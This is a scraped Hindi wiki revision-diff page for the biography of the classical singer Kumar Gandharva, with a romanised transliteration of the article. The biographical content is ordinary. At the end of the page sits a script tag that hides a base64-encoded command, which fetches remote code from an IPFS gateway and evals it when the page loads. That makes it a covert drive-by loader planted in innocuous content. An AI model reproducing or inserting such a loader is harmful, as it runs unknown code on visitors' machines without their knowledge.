Difference between revisions of "कुमार गंधर्व"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''पंडित कुमार गंधर्व''' (जन्म- 8 अप्रॅल, 1924 - मृत्यु- [[12 ज...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
 
'''पंडित कुमार गंधर्व''' (जन्म- [[8 अप्रॅल]], [[1924]] - मृत्यु- [[12 जनवरी]], [[1992]])  [[भारत]] के सुप्रसिद्ध शास्त्रीय गायक थे। जिनका वास्तविक नाम 'शिवपुत्र सिद्धरामैया कोमकाली' है।  
 
'''पंडित कुमार गंधर्व''' (जन्म- [[8 अप्रॅल]], [[1924]] - मृत्यु- [[12 जनवरी]], [[1992]])  [[भारत]] के सुप्रसिद्ध शास्त्रीय गायक थे। जिनका वास्तविक नाम 'शिवपुत्र सिद्धरामैया कोमकाली' है।  
 
==जीवन परिचय==
 
==जीवन परिचय==
कुमार गंधर्व का जन्म [[कर्नाटक]] के धारवाड़ में 8 अप्रॅल 1924 को हुआ। और [[पुणे]] में प्रोफेसर देवधर और अंजनी बाई मालपेकर से [[संगीत]] की शिक्षा पाई। शिवपुत्र जन्म जात गायक थे। दस वर्ष की आयु से ही संगीत समारोहों में गाने लगे थे और ऐसा चमत्कारी गायन करते थे कि उनका नाम कुमार गंधर्व पड़ गया।  
+
कुमार गंधर्व का जन्म [[कर्नाटक]] के धारवाड़ में 8 अप्रॅल 1924 को हुआ। और [[पुणे]] में प्रोफेसर देवधर और अंजनी बाई मालपेकर से [[संगीत]] की शिक्षा पाई। शिवपुत्र जन्म जात गायक थे। दस वर्ष की आयु से ही संगीत समारोहों में गाने लगे थे और ऐसा चमत्कारी गायन करते थे कि उनका नाम कुमार गंधर्व पड़ गया।<ref>{{cite web |url=http://www.culturalindia.net/indian-music/classical-singers/kumar-gandharva.html |title=Pandit Kumar Gandharva |accessmonthday=9 अप्रॅल |accessyear=2012 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=culturalindia.net |language=अंग्रेज़ी}} </ref>
 
====विवाह====
 
====विवाह====
कुमार गंधर्व जी ने अप्रॅल 1947 में भानुमती जो स्वयं एक अच्छी गायिका थीं, से किया और देवास, [[मध्य प्रदेश]] आ गये। यहाँ आने के बाद वे [[इन्दौर]] गये और इन्दौर वे गाना गाने नहीं [[मालवा]] की समशीतोष्ण जलवायु में स्वास्थ लाभ करने आए थे। उन्हें टी .बी थी जिसका उन दिनों कोई पक्का इलाज़ नहीं था। लेकिन जिस दिन वे इंदौर उतरे वह हाल ही आज़ाद हुए [[भारत]] का सबसे काला दिन था। [[30 जनवरी]], [[1948]] में, [[दिल्ली]] में [[नाथुराम गोडसे]] ने [[महात्मा गाँधी]] की हत्या कर दी थी। मालवा में स्वास्थ्य लाभ के जीवन की शुरुआत शुभ मुहुर्त में नहीं हुई थी।
+
कुमार गंधर्व जी ने अप्रॅल 1947 में भानुमती जो स्वयं एक अच्छी गायिका थीं, से किया और देवास, [[मध्य प्रदेश]] आ गये। यहाँ आने के बाद वे [[इन्दौर]] गये और इन्दौर वे गाना गाने नहीं [[मालवा]] की समशीतोष्ण जलवायु में स्वास्थ लाभ करने आए थे। उन्हें टी .बी थी जिसका उन दिनों कोई पक्का इलाज़ नहीं था। लेकिन जिस दिन वे इंदौर उतरे वह हाल ही आज़ाद हुए [[भारत]] का सबसे काला दिन था। [[30 जनवरी]], [[1948]] में, [[दिल्ली]] में [[नाथूराम विनायक गोडसे|नाथूराम गोडसे]] ने [[महात्मा गाँधी]] की हत्या कर दी थी। मालवा में स्वास्थ्य लाभ के जीवन की शुरुआत शुभ मुहुर्त में नहीं हुई थी।
 
====पत्नी भानुमती====  
 
====पत्नी भानुमती====  
 
कुमार जी की पत्नी भानुमती ख़ुद एक गायिका थीं। लेकिन देवास के एक स्कूल में पढ़ा कर गायक पति का इलाज और घर चलाती थीं। जितनी सुन्दर थीं उतनी ही कुशल गृहणी नर्स थीं। कुमार जी स्वस्थ होकर फिर से वह नई तरह का गायन कर सके इसका श्रेय भानुताई को ही दिया जाना चाहिए।  
 
कुमार जी की पत्नी भानुमती ख़ुद एक गायिका थीं। लेकिन देवास के एक स्कूल में पढ़ा कर गायक पति का इलाज और घर चलाती थीं। जितनी सुन्दर थीं उतनी ही कुशल गृहणी नर्स थीं। कुमार जी स्वस्थ होकर फिर से वह नई तरह का गायन कर सके इसका श्रेय भानुताई को ही दिया जाना चाहिए।  
Line 18: Line 18:
 
====भानुमती का निधन====
 
====भानुमती का निधन====
 
सन 1961 में दूसरे पुत्र को जन्म देते हुए भानुमती का निधन हो गया। कुमार जी ने अपने नये घर का नाम भानुकुल रखा। फिर वसुंधरा जी से दूसरा विवाह किया। भानुमती से हुआ मुकुल गंधर्व, और वसुंधरा की हुई कलापिनी, दोनों ही गायक गायिका हैं।
 
सन 1961 में दूसरे पुत्र को जन्म देते हुए भानुमती का निधन हो गया। कुमार जी ने अपने नये घर का नाम भानुकुल रखा। फिर वसुंधरा जी से दूसरा विवाह किया। भानुमती से हुआ मुकुल गंधर्व, और वसुंधरा की हुई कलापिनी, दोनों ही गायक गायिका हैं।
 
 
====निधन====
 
====निधन====
 
68 वर्ष की उम्र में [[12 जनवरी]], [[1992]] में देवास में उनका निधन हो गया। लोक संगीत को शास्त्रीय से भी ऊपर ले जाने वाले कुमार जी ने [[कबीर]] को जैसा गया वैसा कोई नहीं गा सकेगा।  
 
68 वर्ष की उम्र में [[12 जनवरी]], [[1992]] में देवास में उनका निधन हो गया। लोक संगीत को शास्त्रीय से भी ऊपर ले जाने वाले कुमार जी ने [[कबीर]] को जैसा गया वैसा कोई नहीं गा सकेगा।  
 
 
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= |माध्यमिक= |पूर्णता= |शोध= }}
Line 31: Line 27:
 
==बाहरी कड़ियाँ==
 
==बाहरी कड़ियाँ==
 
*[http://vikaszutshisn.blogspot.in/2010/01/blog-post_20.html मालवा की मिट्टी से जुड़ा शास्त्रीय गायक]
 
*[http://vikaszutshisn.blogspot.in/2010/01/blog-post_20.html मालवा की मिट्टी से जुड़ा शास्त्रीय गायक]
 
+
*[http://www.indianetzone.com/28/pt_kumar_gandharva_indian_classical_vocalist.htm Pt. Kumar Gandharva, Indian Classical Vocalist]
 
==संबंधित लेख==
 
==संबंधित लेख==
[[Category:नया पन्ना अप्रॅल-2012]]
+
{{शास्त्रीय गायक कलाकार}}
 +
[[Category:शास्त्रीय_गायक_कलाकार]]
 +
[[Category:पद्म विभूषण]]
 +
[[Category:प्रसिद्ध व्यक्तित्व]]
 +
[[Category:प्रसिद्ध व्यक्तित्व कोश]][[Category:चरित कोश]][[Category:कला कोश]]
  
 
__INDEX__
 
__INDEX__
 
__NOTOC__
 
__NOTOC__

Revision as of 11:23, 9 April 2012

pandit kumar gandharv (janm- 8 aprॅl, 1924 - mrityu- 12 janavari, 1992) bharat ke suprasiddh shastriy gayak the. jinaka vastavik nam 'shivaputr siddharamaiya komakali' hai.

jivan parichay

kumar gandharv ka janm karnatak ke dharava d mean 8 aprॅl 1924 ko hua. aur pune mean prophesar devadhar aur aanjani baee malapekar se sangit ki shiksha paee. shivaputr janm jat gayak the. das varsh ki ayu se hi sangit samarohoan mean gane lage the aur aisa chamatkari gayan karate the ki unaka nam kumar gandharv p d gaya.[1]

vivah

kumar gandharv ji ne aprॅl 1947 mean bhanumati jo svayan ek achchhi gayika thian, se kiya aur devas, madhy pradesh a gaye. yahaan ane ke bad ve indaur gaye aur indaur ve gana gane nahian malava ki samashitoshn jalavayu mean svasth labh karane ae the. unhean ti .bi thi jisaka un dinoan koee pakka ilaz nahian tha. lekin jis din ve iandaur utare vah hal hi azad hue bharat ka sabase kala din tha. 30 janavari, 1948 mean, dilli mean nathooram godase ne mahatma gaandhi ki hatya kar di thi. malava mean svasthy labh ke jivan ki shuruat shubh muhurt mean nahian huee thi.

patni bhanumati

kumar ji ki patni bhanumati khud ek gayika thian. lekin devas ke ek skool mean padha kar gayak pati ka ilaj aur ghar chalati thian. jitani sundar thian utani hi kushal grihani nars thian. kumar ji svasth hokar phir se vah nee tarah ka gayan kar sake isaka shrey bhanutaee ko hi diya jana chahie.

naye kumar gandharv

jis ghar mean kumar ji svasth labh kar rahe the, tab vah devas ke lagabhag bahar tha, aur vahaan hat laga karata tha. kumar ji ne vahian bistar par p de p de malavi ke khaanti svar mahilaoan se sune. vahian pag- pag par gitoan se chalane vale malavi lok jivan se unaka sakshatakar hua. sangit ve sikhe hue the aur shastriy gayan mean unaka nam bhi tha. lekin svasth hote hue aur naya jivan pate hue unamean ek gayak ka bhi janm hua. san 1952 ke bad jab ve thik hokar gane lage to purane kumar gandharv nahian rah gaye the.

malava ki mitti mean sangit ki sugandh

ek din mama majoomadar ke ghar chhoti si mahafil mean gate hue unhoanne achanak kaha "ab mujhe gana a gaya". vah hamare malava ke anyatam gayak kumar gandharv ka janm tha. unhean bachapan se sunane vale vaman hari deshapaande ne un dinoan ke bare mean likha hai-

"n jane devas ki zamin mean kaisa jadoo hai. mujhe vahaan ki mitti mean sangit ki sugandh pratit huee."

malava ke lok jivan se kumar ji ke sakshatkar par deshapaande ne likha, "bistar par p de-p de ve dhyan se asapas se uthane vale gramavasiyoan ke lokagitoan ke svaroan ko suna karate the. ve un lokagitoan aur lok dhunoan ki aur akarshit hote chale gaye. isamean se ek naye vishv ka darshan unhean prapt hua."

  • kalidas ke bad kumar gandharv malava ke sabase divy saanskritik vibhooti haian.

bhanumati ka nidhan

san 1961 mean doosare putr ko janm dete hue bhanumati ka nidhan ho gaya. kumar ji ne apane naye ghar ka nam bhanukul rakha. phir vasuandhara ji se doosara vivah kiya. bhanumati se hua mukul gandharv, aur vasuandhara ki huee kalapini, donoan hi gayak gayika haian.

nidhan

68 varsh ki umr mean 12 janavari, 1992 mean devas mean unaka nidhan ho gaya. lok sangit ko shastriy se bhi oopar le jane vale kumar ji ne kabir ko jaisa gaya vaisa koee nahian ga sakega.


tika tippani aur sandarbh

  1. Pandit Kumar Gandharva (aangrezi) (ech.ti.em.el) culturalindia.net. abhigaman tithi: 9 aprॅl, 2012.

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>